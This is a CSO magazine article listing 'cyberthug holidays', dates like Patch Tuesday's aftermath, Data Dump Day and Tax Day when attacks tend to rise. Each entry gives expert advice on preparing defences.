Keep these cyberthug holidays marked on your calendar

They won’t knock on the front door bearing gifts and treats, but sooner or later, you’ll know these goons have arrived as you and your organization foot the bill for their good time.

It’s no happy day for enterprises when cyber thugs celebrate their favorite ‘holidays’—special days when they attack with even more cunning and fervor. Learn these days and get ready to respond to related exploitations.

  1. Software Support Retirement / End of Support Day. This is the date when support ends for any OS or software package. Unsupported software leaves enterprises open to attack. Because the vendor will no longer make general releases of security patches, each new hole attackers uncover will remain vulnerable.

To prepare for this day and defend the enterprise against such attacks, investigate the availability of extended support offered by the vendor at a premium. Weigh that cost against an investment in deploying the latest software product or version that replaces the older product. Either of these avenues is going to cost you.

If neither option will fit your budget, consider a refresh roadmap that includes well-supported open-source software for applications where the reward outweighs the risk. This software can be more affordable to update.

  1. Zero-Day. This is the date of discovery of any new vulnerability where attackers unleash an exploit for it that same day. Until a patch arrives, the software remains flawed and open to attack. Zero-Day vulnerabilities last for very long periods. “Zero-day attacks last between 19 days and 30 months, with a median of eight months and an average of approximately 10 months,” according to “Before We Knew It. An Empirical Study of Zero-Day Attacks in the Real World”, Symantec Research Labs, 2012.

Since Zero-Days can live so long without patches, patching is a non-starter in those instances where no patch is available. To defend the enterprise in those instances, be ready to discover and remediate attacks quickly and thoroughly. Companies that offer threat intelligence data points about potential indicators of compromise can arm network defenders with advanced warnings, says Margee Abrams, director of security solutions, Neustar. You should baseline, harden, and image endpoint devices so that you can immediately reimage them where anomalies appear outside that baseline, adds Abrams.

  1. Patch Tuesday / Ida Pro Wednesday. By the day after Patch Tuesday, attackers have routinely reverse engineered those Microsoft patches using a tool called Ida Pro and then released exploits that penetrate the patches, says Jayson Street, Infosec Ranger, Pwnie Express.

To prepare for and defend against Ida Pro Wednesday, enterprises should use ample, layered attack mitigations such as network firewalls, IPS, and network segmentation as buffers until the organization can roll new patches for the reverse engineered patches, Street explains.

  1. Data Dump Day. This is any day when attackers release stolen data online on anonymous text sharing or bulletin board sites such as Pastebin or 4chan. Dumps can include employee information, customer information such as credit card numbers and PII, intellectual property and trade secrets, and much more, says Demetrios Lazarikos, CISO, vArmour. If your enterprise is the target on Data Dump Day, you or your customers could suffer further attacks, financial losses, and / or embarrassment, which in the case of the enterprise could cause brand damage.

To prepare for these surprises, improve your awareness of data in these dumps. Engage qualified threat research teams that monitor the Internet underground for cyber-criminal activities that may heighten just before a dump occurs, says Lazarikos. When dumps do happen, an incident response plan should be in place to enable the organization to research its environment, coordinating internal and external threat research efforts to gauge the damage as it happens and find the source of the attack using forensics tools and experts, says Lazarikos. Use these resources, law enforcement, and remediation technologies and techniques that should already be in place to bring the event to a speedy close.

“Before We Knew It. An Empirical Study of Zero-Day Attacks in the Real World”, Symantec Research Labs, 2012

  1. Quarterly Earnings Day. Attacks occur on public companies just before a big quarterly earnings release, combined with shadow shorting of the company’s stock in order to make money based on the ensuing mayhem, says Michael Argast, director, security solutions, TELUS. “Shorting is basically selling a stock without owning it, with the plan to buy the stock later on when the price drops. By creating a crisis, the attackers can manipulate the stock price downwards and profit when the price goes back up,” explains Argast.

To defend against this cyber thug celebration, make sure the security team is on high alert and recognizes that this is a critical time for the business, says Argast. Realize that the criminals don’t necessarily need to use a technological attack vector to create havoc here. “They can also use fake press releases to create false, foreboding news about the company. Monitor social and financial networks for information that may be inaccurate and be ready to respond quickly,” says Argast.

  1. Black Friday / Cyber Monday. Heavy shopping on these dates means more exposed credit cards and consumer information, driving attackers to take advantage at these times.

Retail security expert Demetrios Lazarikos, CISO, vArmour cites these areas of preparation for preventing the attackers from seeing the most profit on these dates. Use data center / IT and security solutions that are non-intrusive and transparent to stakeholders so that the organization can continually see what is going on inside its systems despite its constant embrace with emerging technologies, according to Lazarikos. “Embed IT solutions that align with digital transformation and evaluate these technologies even during the holiday shopping season. This is the best time to evaluate new systems since this is when the most traffic will visit your environment and when cyber criminals are most active,” says Lazarikos.

  1. Tax Day. “I’ve seen an increase in phishing/spear phishing attacks on the business around Tax Day (April 15th),” says Lazarikos. The emails typical of these attacks assume the authority of the IRS in requesting that the recipient visit the ‘IRS’ website link enclosed or open the ‘IRS’ file. The file or link contains requests for updated personally identifiable information or PII, which the attackers will exploit.

During tax time, says Lazarikos, remember that the IRS never sends such emails. They will only make contact through the US mail. “If you are a business owner, employee, or executive who received this, email the IRS about it at,” says Lazarikos. Certainly never open it or follow its instructions. Keep and share clear, highly-visible, company-wide policies about this.

The broader calendar

If you’ve been around, you probably know that attacks ebb and flow. If this seems to happen with your organization around particular dates or events, add them to the list to make yourself especially resilient at these times.

Join the CSO newsletter!

Error: Please check your email address.

More about CSOEmpiricalEngageIPSIRSMicrosoftSymantec

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by By David Geer

Latest Videos

  • 150x50

    CSO Webinar: Will your data protection strategy be enough when disaster strikes?

    Speakers: - Paul O’Connor, Engagement leader - Performance Audit Group, Victorian Auditor-General’s Office (VAGO) - Nigel Phair, Managing Director, Centre for Internet Safety - Joshua Stenhouse, Technical Evangelist, Zerto - Anthony Caruana, CSO MC & Moderator

    Play Video

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

More videos

Blog Posts

Market Place